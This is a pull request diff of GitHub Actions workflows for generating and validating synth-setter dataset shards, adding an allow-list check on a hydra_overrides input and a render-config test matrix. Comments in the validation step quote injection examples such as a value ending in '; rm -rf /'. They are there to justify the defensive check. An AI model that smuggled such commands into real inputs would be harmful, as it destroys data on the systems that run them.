### PR TITLE
fix(vst): invert thread model for always_on — show_editor on main thread

### DIFF
--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -166,12 +166,23 @@ jobs:
       # `render.gui_toggle_cadence=always_on; rm -rf /` would be interpreted as
       # shell syntax on the worker. Validating at the entry point fails both
       # provider branches before the unquoted expansion can run.
+      #
+      # Bash `[[ ... =~ ... ]]` is whole-input by default (no `m` modifier), so a
+      # payload like `key=v$'\n'; rm -rf /` can't bypass via a passing first line
+      # the way a line-oriented `grep -Eq` would. The explicit newline/CR guard
+      # rejects multi-line input before regex matching so the error message points
+      # at the right failure mode.
       - name: Validate hydra_overrides
         env:
           INPUT_HYDRA_OVERRIDES: ${{ inputs.hydra_overrides }}
         run: |
           set -euo pipefail
-          if ! printf '%s\n' "$INPUT_HYDRA_OVERRIDES" | grep -Eq '^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$'; then
+          REGEX='^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$'
+          if [[ "$INPUT_HYDRA_OVERRIDES" == *$'\n'* || "$INPUT_HYDRA_OVERRIDES" == *$'\r'* ]]; then
+            echo "::error::hydra_overrides contains newline/carriage-return; only single-line input is accepted."
+            exit 1
+          fi
+          if ! [[ "$INPUT_HYDRA_OVERRIDES" =~ $REGEX ]]; then
             echo "::error::hydra_overrides contains disallowed characters; only [A-Za-z0-9._=,/-] tokens separated by single spaces are allowed. See workflow header for the validation regex."
             exit 1
           fi

--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -1,9 +1,18 @@
 name: Generate Dataset Shards
 
-# Reusable workflow that owns one provider's generate_dataset invocation.
-# Callers fan out across providers (see test-dataset-generation.yml) and pass
-# per-provider values via inputs. All providers drive `synth-setter-generate-dataset`
-# with a `skypilot_launch.compute_template=...` Hydra override.
+# Reusable workflow that owns one provider's generate_dataset invocation and
+# unconditionally validates the resulting shards against
+# `synth_setter.pipeline.ci.validate_shard` before returning. Callers fan out
+# across providers (see test-dataset-generation.yml) and pass per-provider
+# values via inputs. All providers drive `synth-setter-generate-dataset` with
+# a `skypilot_launch.compute_template=...` Hydra override.
+#
+# Validation is always-on (no opt-in flag): every caller of this workflow
+# gets shard-contract enforcement. This closes the contract-drift gap that
+# #1214 hit on the float16/float32 dtype mismatch — generate-only success
+# is no longer sufficient; shards must also pass the
+# `check_shard_contracts` contract. Workflow rename to reflect the new
+# behaviour is tracked at #1224.
 #
 # Optional `hydra_overrides` input — whitespace-separated Hydra `key=value`
 # tokens appended to the launcher invocation. Tokens must not contain embedded
@@ -593,6 +602,34 @@ jobs:
           fi
           echo "spec_uri=${SPEC_URI}" >> "${GITHUB_OUTPUT}"
           echo "spec_uri: ${SPEC_URI}"
+
+      # Always validate the freshly-uploaded shards against the
+      # `check_shard_contracts` contract before this workflow returns.
+      # `validate_all_shards_from_r2(spec)` (in
+      # src/synth_setter/pipeline/ci/validate_shard.py) iterates `spec.shards`
+      # and pulls each HDF5 from R2 for the structural + shape + value +
+      # row-count checks. Runs inside the dev-snapshot image (already pulled
+      # above for runpod/oci, locally loaded into kind for skypilot-local) so
+      # h5py / numpy are available without a host-side install. Re-pulling
+      # the image when only kind has it is a no-op against the docker cache.
+      - name: Validate all shards from R2
+        env:
+          SPEC_URI: ${{ steps.spec_uri.outputs.spec_uri }}
+          RCLONE_CONFIG_R2_ACCESS_KEY_ID: ${{ secrets.RCLONE_CONFIG_R2_ACCESS_KEY_ID }}
+          RCLONE_CONFIG_R2_SECRET_ACCESS_KEY: ${{ secrets.RCLONE_CONFIG_R2_SECRET_ACCESS_KEY }}
+          RCLONE_CONFIG_R2_ENDPOINT: ${{ secrets.RCLONE_CONFIG_R2_ENDPOINT }}
+        run: |
+          set -euo pipefail
+          docker run --rm \
+            -v "${{ github.workspace }}:/home/build/synth-setter:ro" \
+            -e RCLONE_CONFIG_R2_TYPE=s3 \
+            -e RCLONE_CONFIG_R2_PROVIDER=Cloudflare \
+            -e RCLONE_CONFIG_R2_ACCESS_KEY_ID \
+            -e RCLONE_CONFIG_R2_SECRET_ACCESS_KEY \
+            -e RCLONE_CONFIG_R2_ENDPOINT \
+            -e SPEC_URI \
+            "${IMAGE}" \
+            python3 -m synth_setter.pipeline.ci.validate_shard "$SPEC_URI"
 
       # Pull the canonical spec into the debug artifact alongside generate.log
       # / sky_logs so operators don't have to chase R2 to inspect the run.

--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -5,6 +5,11 @@ name: Generate Dataset Shards
 # per-provider values via inputs. All providers drive `synth-setter-generate-dataset`
 # with a `skypilot_launch.compute_template=...` Hydra override.
 #
+# Optional `hydra_overrides` input — whitespace-separated tokens appended
+# verbatim to the launcher invocation. Used by the render-config matrix to
+# fan over `render.gui_toggle_cadence` and `output_format` without pre-baking
+# one Hydra experiment per cell.
+#
 # Provider-specific behavior:
 #   * `skypilot-local` — provisions a kind cluster on the runner via
 #     `sky local up`, loads the dev-snapshot image into kind, writes the
@@ -68,6 +73,11 @@ on:
         required: false
         type: string
         default: "run-metadata"
+      hydra_overrides:
+        description: "Extra whitespace-separated Hydra overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Each token is forwarded verbatim — callers are responsible for escaping any spaces inside a single override."
+        required: false
+        type: string
+        default: ""
     outputs:
       spec_uri:
         description: "Canonical r2:// URI of the materialized spec (under-prefix `input_spec.json`). Consumed by validate-dataset-shards.yaml."
@@ -118,6 +128,11 @@ on:
         required: false
         type: string
         default: "run-metadata"
+      hydra_overrides:
+        description: "Extra whitespace-separated Hydra overrides appended verbatim to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`)."
+        required: false
+        type: string
+        default: ""
 
 permissions:
   contents: read
@@ -328,6 +343,7 @@ jobs:
           INPUT_LOCAL: ${{ inputs.local }}
           INPUT_TAIL: ${{ inputs.tail }}
           INPUT_NUM_WORKERS: ${{ inputs.num_workers }}
+          INPUT_HYDRA_OVERRIDES: ${{ inputs.hydra_overrides }}
           SYNTH_SETTER_CI_MODE: "1"
         run: |
           set -euo pipefail
@@ -345,6 +361,10 @@ jobs:
           fi
           if [[ "$INPUT_TAIL" == "true" ]]; then
             OVERRIDES+=("skypilot_launch.tail=true")
+          fi
+          if [[ -n "$INPUT_HYDRA_OVERRIDES" ]]; then
+            read -ra HYDRA_EXTRA <<< "$INPUT_HYDRA_OVERRIDES"
+            OVERRIDES+=("${HYDRA_EXTRA[@]}")
           fi
           synth-setter-generate-dataset "${OVERRIDES[@]}" \
             2>&1 | tee "${RUN_METADATA_DIR}/generate.log"
@@ -448,6 +468,7 @@ jobs:
           NUM_WORKERS_OVERRIDE: ${{ inputs.num_workers != '' && format('skypilot_launch.num_workers={0}', inputs.num_workers) || '' }}
           TAIL_OVERRIDE: ${{ inputs.tail && 'skypilot_launch.tail=true' || '' }}
           LOCAL_OVERRIDE: ${{ inputs.local && 'skypilot_launch.local=true' || '' }}
+          HYDRA_OVERRIDES_EXTRA: ${{ inputs.hydra_overrides }}
         run: |
           set -euo pipefail
           docker run --rm \
@@ -474,6 +495,7 @@ jobs:
             -e NUM_WORKERS_OVERRIDE \
             -e TAIL_OVERRIDE \
             -e LOCAL_OVERRIDE \
+            -e HYDRA_OVERRIDES_EXTRA \
             "${IMAGE}" \
             bash -c '
               set -euo pipefail
@@ -485,7 +507,7 @@ jobs:
                 "skypilot_launch.compute_template=$TEMPLATE" \
                 "skypilot_launch.job_name=$CLUSTER_NAME" \
                 "skypilot_launch.worker_image_tag=$IMAGE_TAG" \
-                $LOCAL_OVERRIDE $NUM_WORKERS_OVERRIDE $TAIL_OVERRIDE
+                $LOCAL_OVERRIDE $NUM_WORKERS_OVERRIDE $TAIL_OVERRIDE $HYDRA_OVERRIDES_EXTRA
             ' \
             2>&1 | tee "${RUN_METADATA_DIR}/generate.log"
           shopt -s nullglob

--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -357,14 +357,15 @@ jobs:
       # same run_id). The step output `spec_path` resolves that file so later
       # steps don't have to repeat the glob.
       #
-      # 20-min step cap caps a hung launcher so the `if: always()` log-snapshot
-      # step still runs. NOTE: step-level timeout sends SIGKILL — `finally`
-      # blocks are bypassed; operators may need to `sky jobs cancel` manually.
-      # See #876.
+      # 40-min step cap accommodates the 8-cell render-matrix cells (#1204)
+      # without leaving headroom-too-thin for a hung launcher to surface; the
+      # cap still bounds a hung launcher so the `if: always()` log-snapshot
+      # step runs. NOTE: step-level timeout sends SIGKILL — `finally` blocks
+      # are bypassed; operators may need to `sky jobs cancel` manually. See #876.
       - name: Run synth-setter-generate-dataset against local-template (skypilot-local row)
         id: gen_local
         if: ${{ inputs.provider == 'skypilot-local' }}
-        timeout-minutes: 20
+        timeout-minutes: 40
         env:
           RCLONE_CONFIG_R2_ACCESS_KEY_ID: ${{ secrets.RCLONE_CONFIG_R2_ACCESS_KEY_ID }}
           RCLONE_CONFIG_R2_SECRET_ACCESS_KEY: ${{ secrets.RCLONE_CONFIG_R2_SECRET_ACCESS_KEY }}

--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -9,7 +9,10 @@ name: Generate Dataset Shards
 # tokens appended to the launcher invocation. Tokens must not contain embedded
 # spaces; the docker (runpod/oci) row expands `$HYDRA_OVERRIDES_EXTRA` unquoted
 # inside the worker container, so any whitespace inside a token splits it into
-# separate arguments. Used by the render-config matrix to fan over
+# separate arguments. The "Validate hydra_overrides" step rejects any input
+# that doesn't match `^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$` so shell
+# metacharacters (`;`, `&&`, `|`, `$()`, ...) can't ride through the unquoted
+# docker expansion. Used by the render-config matrix to fan over
 # `render.gui_toggle_cadence` and `output_format` without pre-baking one
 # Hydra experiment per cell.
 #
@@ -77,7 +80,7 @@ on:
         type: string
         default: "run-metadata"
       hydra_overrides:
-        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Tokens must not contain embedded spaces — the docker (runpod/oci) row expands this variable unquoted into the worker container, so any whitespace inside a token splits it into separate arguments."
+        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Validated against `^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$` — any shell metacharacter (`;`, `&&`, `|`, `$()`, ...) fails the workflow because the docker (runpod/oci) row expands `$HYDRA_OVERRIDES_EXTRA` unquoted inside the worker container."
         required: false
         type: string
         default: ""
@@ -132,7 +135,7 @@ on:
         type: string
         default: "run-metadata"
       hydra_overrides:
-        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Tokens must not contain embedded spaces — the docker (runpod/oci) row expands this variable unquoted into the worker container."
+        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Validated against `^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$` — any shell metacharacter fails the workflow because the docker row expands the variable unquoted inside the worker container."
         required: false
         type: string
         default: ""
@@ -156,6 +159,22 @@ jobs:
     steps:
       - name: Checkout
         uses: actions/checkout@v6
+
+      # Reject hydra_overrides containing anything outside the allowed character
+      # class. The docker (runpod/oci) row expands `$HYDRA_OVERRIDES_EXTRA`
+      # unquoted inside `bash -c`, so an unrestricted value like
+      # `render.gui_toggle_cadence=always_on; rm -rf /` would be interpreted as
+      # shell syntax on the worker. Validating at the entry point fails both
+      # provider branches before the unquoted expansion can run.
+      - name: Validate hydra_overrides
+        env:
+          INPUT_HYDRA_OVERRIDES: ${{ inputs.hydra_overrides }}
+        run: |
+          set -euo pipefail
+          if ! printf '%s\n' "$INPUT_HYDRA_OVERRIDES" | grep -Eq '^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$'; then
+            echo "::error::hydra_overrides contains disallowed characters; only [A-Za-z0-9._=,/-] tokens separated by single spaces are allowed. See workflow header for the validation regex."
+            exit 1
+          fi
 
       # Resolve cluster_name: caller-provided value wins; empty falls back to a
       # manual-default that includes run_id + run_attempt so concurrent manual

--- a/.github/workflows/generate-dataset-shards.yaml
+++ b/.github/workflows/generate-dataset-shards.yaml
@@ -5,10 +5,13 @@ name: Generate Dataset Shards
 # per-provider values via inputs. All providers drive `synth-setter-generate-dataset`
 # with a `skypilot_launch.compute_template=...` Hydra override.
 #
-# Optional `hydra_overrides` input — whitespace-separated tokens appended
-# verbatim to the launcher invocation. Used by the render-config matrix to
-# fan over `render.gui_toggle_cadence` and `output_format` without pre-baking
-# one Hydra experiment per cell.
+# Optional `hydra_overrides` input — whitespace-separated Hydra `key=value`
+# tokens appended to the launcher invocation. Tokens must not contain embedded
+# spaces; the docker (runpod/oci) row expands `$HYDRA_OVERRIDES_EXTRA` unquoted
+# inside the worker container, so any whitespace inside a token splits it into
+# separate arguments. Used by the render-config matrix to fan over
+# `render.gui_toggle_cadence` and `output_format` without pre-baking one
+# Hydra experiment per cell.
 #
 # Provider-specific behavior:
 #   * `skypilot-local` — provisions a kind cluster on the runner via
@@ -74,7 +77,7 @@ on:
         type: string
         default: "run-metadata"
       hydra_overrides:
-        description: "Extra whitespace-separated Hydra overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Each token is forwarded verbatim — callers are responsible for escaping any spaces inside a single override."
+        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Tokens must not contain embedded spaces — the docker (runpod/oci) row expands this variable unquoted into the worker container, so any whitespace inside a token splits it into separate arguments."
         required: false
         type: string
         default: ""
@@ -129,7 +132,7 @@ on:
         type: string
         default: "run-metadata"
       hydra_overrides:
-        description: "Extra whitespace-separated Hydra overrides appended verbatim to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`)."
+        description: "Extra whitespace-separated Hydra `key=value` overrides appended to the launcher invocation (e.g. `render.gui_toggle_cadence=always_on output_format=wds`). Tokens must not contain embedded spaces — the docker (runpod/oci) row expands this variable unquoted into the worker container."
         required: false
         type: string
         default: ""

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -3,25 +3,27 @@ name: Test Dataset Generation (Render-Config Matrix)
 # Per-PR matrix exercise of ``test-dataset-generation`` across the render-side
 # code paths a PR can regress. The base config is ``smoke-shard`` (the only
 # experiment whose 12-sample volume fits comfortably under the reusable's
-# 20-min step cap); cells fan out across ``render.gui_toggle_cadence`` and
-# ``output_format`` so a regression in the ``editor_held_open`` handshake
-# (#1198, #1204), the ``always_on`` gui-toggle cadence (#1187), or the
-# wds writer surfaces on the PR that introduces it instead of the next
+# step cap); cells fan out across ``render.gui_toggle_cadence`` and
+# ``output_format``. The matrix exercises ``run_with_editor_held_open``
+# (main thread blocks in ``show_editor``, render worker runs the loop)
+# under each ``gui_toggle_cadence`` and ``output_format`` combination, so
+# a regression in either the thread inversion (#1204) or the cadence
+# dispatch (#1187) surfaces at PR time instead of waiting for the
 # nightly cron.
 #
 # Matrix axes (8 cells = 4 x 2, all fan-out in parallel):
 #   * cadence — every value of the ``_GuiToggleCadence`` Literal in
 #     ``src/synth_setter/pipeline/schemas/spec.py``. ``always_on`` is the
-#     cell #1204 specifically guards against the held-open handshake
-#     regression; ``never`` / ``once`` / ``render`` keep the other warm-up
-#     paths under PR-time coverage.
+#     cell that exercises ``run_with_editor_held_open`` end-to-end;
+#     ``never`` / ``once`` / ``render`` keep the other warm-up paths
+#     under PR-time coverage.
 #   * output_format — ``hdf5`` and ``wds``. Injected via the reusable's
 #     ``hydra_overrides`` input rather than a sibling experiment file so
 #     the matrix stays a single ``smoke-shard`` base.
 #
 # ``RenderConfig.parallel`` (#1189) coverage stays on the existing weekly
 # cron in ``test-dataset-generation.yml`` (the nightly-parallel-smoke config
-# would not fit under the 20-min step cap once multiplied by 8 cells).
+# would not fit under the 40-min step cap once multiplied by 8 cells).
 #
 # Validation of the produced shards is intentionally out of scope here:
 # ``needs.<job>.outputs.spec_uri`` from a matrix-strategy reusable workflow

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -11,19 +11,47 @@ name: Test Dataset Generation (Render-Config Matrix)
 # dispatch (#1187) surfaces at PR time instead of waiting for the
 # nightly cron.
 #
-# Matrix axes (8 cells = 4 x 2, all fan-out in parallel):
-#   * cadence — every value of the ``_GuiToggleCadence`` Literal in
-#     ``src/synth_setter/pipeline/schemas/spec.py``. ``always_on`` is the
-#     cell that exercises ``run_with_editor_held_open`` end-to-end;
-#     ``never`` / ``once`` / ``render`` keep the other warm-up paths
-#     under PR-time coverage.
+# Two jobs cover complementary contracts:
+#
+#   * ``generate`` — positive matrix. 6 cells (``never`` / ``once`` /
+#     ``render``) x (``hdf5`` / ``wds``) running through the
+#     ``generate-dataset-shards.yaml`` reusable workflow. ``always_on`` is
+#     intentionally NOT in this matrix: combining it with the schema's
+#     default ``plugin_reload_cadence="render"`` is a configuration error
+#     that the ``RenderConfig._always_on_requires_plugin_reload_once``
+#     validator rejects at spec construction (``src/synth_setter/pipeline/
+#     schemas/spec.py``). Per-cell ``hydra_overrides`` could opt in to
+#     ``always_on`` + ``plugin_reload_cadence=once`` here, but the
+#     end-to-end ``always_on`` render path is already covered by
+#     ``test_always_on_renders_small_shard_end_to_end`` in
+#     ``test-vst-slow.yml`` against a real Surge XT plugin.
+#
+#   * ``validator_rejects_always_on`` — contract job. 2 inline cells
+#     (``always_on``) x (``hdf5`` / ``wds``) invoking
+#     ``synth-setter-generate-dataset`` directly with ``continue-on-error``
+#     and asserting both that the CLI exited non-zero AND that the
+#     ``_always_on_requires_plugin_reload_once`` validator message was
+#     surfaced. The cells run inline (no docker / no kind) because the
+#     validator fires during ``spec_from_cfg`` before any side effect, so a
+#     plain python install is sufficient and far cheaper than the reusable
+#     workflow's compute setup. The reusable workflow can't host this
+#     contract directly because step-level ``continue-on-error`` doesn't
+#     compose into a reusable-workflow caller and the matrix needs to
+#     observe per-cell failure.
+#
+# Matrix axes for the positive ``generate`` job (6 cells = 3 x 2, all
+# fan-out in parallel):
+#   * cadence — three of the four ``_GuiToggleCadence`` Literal values in
+#     ``src/synth_setter/pipeline/schemas/spec.py``. ``never`` / ``once`` /
+#     ``render`` keep the warm-up paths under PR-time coverage;
+#     ``always_on`` lives in the contract job above.
 #   * output_format — ``hdf5`` and ``wds``. Injected via the reusable's
 #     ``hydra_overrides`` input rather than a sibling experiment file so
 #     the matrix stays a single ``smoke-shard`` base.
 #
 # ``RenderConfig.parallel`` (#1189) coverage stays on the existing weekly
 # cron in ``test-dataset-generation.yml`` (the nightly-parallel-smoke config
-# would not fit under the 40-min step cap once multiplied by 8 cells).
+# would not fit under the 40-min step cap once multiplied by the cells).
 #
 # Validation of the produced shards is intentionally out of scope here:
 # ``needs.<job>.outputs.spec_uri`` from a matrix-strategy reusable workflow
@@ -35,7 +63,9 @@ name: Test Dataset Generation (Render-Config Matrix)
 #
 # Required secrets (forwarded via ``secrets: inherit``):
 #   RCLONE_CONFIG_R2_ACCESS_KEY_ID, RCLONE_CONFIG_R2_SECRET_ACCESS_KEY,
-#   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — every cell (R2 upload).
+#   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — positive ``generate`` cells
+#   (R2 upload). The contract job needs no secrets — it fails before
+#   ``ensure_r2_env_loaded`` is called.
 
 on:
   workflow_dispatch:
@@ -72,7 +102,7 @@ jobs:
       # own pass/fail signal even if a sibling cell aborts.
       fail-fast: false
       matrix:
-        cadence: [never, once, render, always_on]
+        cadence: [never, once, render]
         output_format: [hdf5, wds]
     uses: ./.github/workflows/generate-dataset-shards.yaml
     with:
@@ -86,3 +116,74 @@ jobs:
       artifact_name: render-matrix-run-metadata-${{ matrix.cadence }}-${{ matrix.output_format }}-${{ strategy.job-index }}
       hydra_overrides: render.gui_toggle_cadence=${{ matrix.cadence }} output_format=${{ matrix.output_format }}
     secrets: inherit
+
+  # Contract job — asserts ``RenderConfig._always_on_requires_plugin_reload_once``
+  # rejects ``gui_toggle_cadence="always_on"`` combined with the schema's
+  # default ``plugin_reload_cadence="render"``. The reusable workflow can't
+  # host this (step-level ``continue-on-error`` doesn't compose into a
+  # reusable-workflow caller, and the matrix needs to observe per-cell
+  # failure), so the CLI runs inline. The validator fires inside
+  # ``spec_from_cfg`` before ``ensure_r2_env_loaded``, so no cloud creds or
+  # docker image are required.
+  validator_rejects_always_on:
+    name: Validator rejects always_on (cadence=always_on / ${{ matrix.output_format }})
+    runs-on: ubuntu-latest
+    strategy:
+      fail-fast: false
+      matrix:
+        output_format: [hdf5, wds]
+    timeout-minutes: 10
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v6
+
+      - name: Set up Python
+        uses: actions/setup-python@v6
+        with:
+          python-version: "3.10"
+
+      - name: Install uv
+        uses: astral-sh/setup-uv@d0cc045d04ccac9d8b7881df0226f9e82c39688e # v6.8.0
+        with:
+          enable-cache: true
+          cache-dependency-glob: "pyproject.toml"
+
+      # ``-e .`` pulls Hydra + Pydantic — enough to import
+      # ``synth_setter.cli.generate_dataset:main`` and exercise
+      # ``spec_from_cfg``. Skip ``[torch,dev]`` so the contract job stays
+      # well under a minute.
+      - name: Install package (validator only)
+        run: uv pip install --system -e .
+
+      # ``continue-on-error`` keeps the matrix cell green so the next step
+      # can assert the failure. ``PIPESTATUS[0]`` captures the launcher
+      # exit (the ``| tee`` tail returns 0 even when the launcher raises).
+      - name: Run generate-dataset (must fail for always_on + default reload cadence)
+        id: cli
+        continue-on-error: true
+        env:
+          HYDRA_FULL_ERROR: "1"
+        run: |
+          set -uo pipefail
+          synth-setter-generate-dataset \
+            experiment=generate_dataset/smoke-shard \
+            render.gui_toggle_cadence=always_on \
+            output_format=${{ matrix.output_format }} \
+            2>&1 | tee cli.log
+          echo "cli_exit=${PIPESTATUS[0]}" >> "${GITHUB_OUTPUT}"
+
+      - name: Assert validator rejected the combination
+        env:
+          CLI_EXIT: ${{ steps.cli.outputs.cli_exit }}
+        run: |
+          set -euo pipefail
+          if [[ "${CLI_EXIT}" == "0" ]]; then
+            echo "::error::expected synth-setter-generate-dataset to exit non-zero on gui_toggle_cadence=always_on with default plugin_reload_cadence (=render); got exit 0. The _always_on_requires_plugin_reload_once validator did not fire."
+            exit 1
+          fi
+          if ! grep -q 'gui_toggle_cadence="always_on" requires plugin_reload_cadence="once"' cli.log; then
+            echo "::error::CLI exited non-zero (${CLI_EXIT}) but the _always_on_requires_plugin_reload_once validator message was not surfaced; some other failure masked the contract under test."
+            cat cli.log
+            exit 1
+          fi
+          echo "validator raised as expected (exit=${CLI_EXIT})"

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -1,0 +1,93 @@
+name: Test Dataset Generation (Render-Config Matrix)
+
+# Per-PR matrix exercise of ``test-dataset-generation`` across the existing
+# render configs, so a regression in the ``editor_held_open`` handshake
+# (#1198, #1204), the ``always_on`` gui-toggle cadence (#1187), or
+# ``RenderConfig.parallel`` (#1189) surfaces on the PR that introduces it
+# instead of the next nightly cron. Each row dispatches the
+# ``generate-dataset-shards.yaml`` reusable against ``skypilot-local`` only —
+# the kind cluster on the runner is the cheapest path that still drives the
+# real launcher / R2 round-trip, and paid-provider coverage stays on the
+# existing weekly cron in ``test-dataset-generation.yml``.
+#
+# Matrix axes:
+#   * dataset_config — every PR-sized experiment under
+#     ``configs/experiment/generate_dataset/``. ``ci-materialize-test`` and
+#     ``ci-materialize-test-wds`` (96 samples) are intentionally included to
+#     cover the larger-volume cadence path; ``nightly-parallel-smoke`` covers
+#     ``RenderConfig.parallel=true``. The 480k-sample ``surge-simple`` and
+#     ``10-1k-shards`` configs are excluded — they belong on the paid
+#     weekly schedule, not the PR matrix.
+#   * output_format — pinned per config (the spec-format cross-check would
+#     deterministically fail a mismatched cell, so the matrix is shaped
+#     per-config rather than fanned 2x).
+#
+# Validation of the produced shards is intentionally out of scope here:
+# ``needs.<job>.outputs.spec_uri`` from a matrix-strategy reusable workflow
+# call collapses to one cell's value, so a fan-out validate would silently
+# point every cell at the same spec. Generate-side success across the
+# matrix is the load-bearing signal for the regressions this workflow
+# guards; shard validation stays on ``test-dataset-generation.yml`` (which
+# runs ``smoke-shard`` only and so does not hit the collapse).
+#
+# Required secrets (forwarded via ``secrets: inherit``):
+#   RCLONE_CONFIG_R2_ACCESS_KEY_ID, RCLONE_CONFIG_R2_SECRET_ACCESS_KEY,
+#   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — every row (R2 upload).
+
+on:
+  workflow_dispatch:
+    inputs:
+      docker_image_tag:
+        description: "Docker image tag (e.g. dev-snapshot, dev-snapshot-<sha>)"
+        required: false
+        default: "dev-snapshot"
+  pull_request:
+    paths:
+      - "src/synth_setter/data/vst/**"
+      - "src/synth_setter/data/render_config.py"
+      - "src/synth_setter/pipeline/schemas/spec.py"
+      - "src/synth_setter/cli/generate_dataset.py"
+      - "configs/experiment/generate_dataset/**"
+      - "configs/render/**"
+      - ".github/workflows/test-dataset-generation-render-matrix.yml"
+      - ".github/workflows/generate-dataset-shards.yaml"
+
+permissions:
+  contents: read
+
+# Stacked PR pushes coalesce on the same ref; manual dispatches stay distinct
+# by mixing ``run_id`` so a re-run against the same SHA does not self-cancel.
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}-${{ github.event_name == 'workflow_dispatch' && github.run_id || 'auto' }}
+  cancel-in-progress: true
+
+jobs:
+  generate:
+    name: Generate (${{ matrix.dataset_config }} / ${{ matrix.output_format }})
+    strategy:
+      # One broken config must not mask others — every cell still emits its
+      # own pass/fail signal even if a sibling cell aborts.
+      fail-fast: false
+      matrix:
+        include:
+          - dataset_config: generate_dataset/smoke-shard
+            output_format: hdf5
+          - dataset_config: generate_dataset/smoke-shard-wds
+            output_format: wds
+          - dataset_config: generate_dataset/ci-materialize-test
+            output_format: hdf5
+          - dataset_config: generate_dataset/ci-materialize-test-wds
+            output_format: wds
+          - dataset_config: generate_dataset/nightly-parallel-smoke
+            output_format: hdf5
+    uses: ./.github/workflows/generate-dataset-shards.yaml
+    with:
+      provider: skypilot-local
+      dataset_config: ${{ matrix.dataset_config }}
+      image_tag: ${{ inputs.docker_image_tag || 'dev-snapshot' }}
+      cluster_name: synth-setter-render-matrix-${{ strategy.job-index }}-${{ github.run_id }}-${{ github.run_attempt }}
+      num_workers: "1"
+      tail: true
+      local: true
+      artifact_name: render-matrix-run-metadata-${{ matrix.output_format }}-${{ strategy.job-index }}
+    secrets: inherit

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -1,30 +1,27 @@
 name: Test Dataset Generation (Render-Config Matrix)
 
-# Per-PR matrix exercise of ``test-dataset-generation`` across the existing
-# render configs, so a regression in the ``editor_held_open`` handshake
-# (#1198, #1204), the ``always_on`` gui-toggle cadence (#1187), or
-# ``RenderConfig.parallel`` (#1189) surfaces on the PR that introduces it
-# instead of the next nightly cron. Each row dispatches the
-# ``generate-dataset-shards.yaml`` reusable against ``skypilot-local`` only —
-# the kind cluster on the runner is the cheapest path that still drives the
-# real launcher / R2 round-trip, and paid-provider coverage stays on the
-# existing weekly cron in ``test-dataset-generation.yml``.
+# Per-PR matrix exercise of ``test-dataset-generation`` across the render-side
+# code paths a PR can regress. The base config is ``smoke-shard`` (the only
+# experiment whose 12-sample volume fits comfortably under the reusable's
+# 20-min step cap); cells fan out across ``render.gui_toggle_cadence`` and
+# ``output_format`` so a regression in the ``editor_held_open`` handshake
+# (#1198, #1204), the ``always_on`` gui-toggle cadence (#1187), or the
+# wds writer surfaces on the PR that introduces it instead of the next
+# nightly cron.
 #
-# Matrix axes:
-#   * dataset_config — every PR-sized experiment under
-#     ``configs/experiment/generate_dataset/`` that exercises a distinct
-#     render-side code path. ``nightly-parallel-smoke`` covers
-#     ``RenderConfig.parallel=true``. The ``ci-materialize-test`` configs
-#     are excluded — they exist for spec-materialization round-trip, not
-#     for render-code coverage (the wds writer is exercised by
-#     ``smoke-shard-wds`` already, and the 96-sample hdf5 cadence does not
-#     add render-side signal beyond what the smoke configs already cover).
-#     The 480k-sample ``surge-simple`` and ``10-1k-shards`` configs are
-#     also excluded — they belong on the paid weekly schedule, not the
-#     PR matrix.
-#   * output_format — pinned per config (the spec-format cross-check would
-#     deterministically fail a mismatched cell, so the matrix is shaped
-#     per-config rather than fanned 2x).
+# Matrix axes (8 cells = 4 x 2, all fan-out in parallel):
+#   * cadence — every value of the ``_GuiToggleCadence`` Literal in
+#     ``src/synth_setter/pipeline/schemas/spec.py``. ``always_on`` is the
+#     cell #1204 specifically guards against the held-open handshake
+#     regression; ``never`` / ``once`` / ``render`` keep the other warm-up
+#     paths under PR-time coverage.
+#   * output_format — ``hdf5`` and ``wds``. Injected via the reusable's
+#     ``hydra_overrides`` input rather than a sibling experiment file so
+#     the matrix stays a single ``smoke-shard`` base.
+#
+# ``RenderConfig.parallel`` (#1189) coverage stays on the existing weekly
+# cron in ``test-dataset-generation.yml`` (the nightly-parallel-smoke config
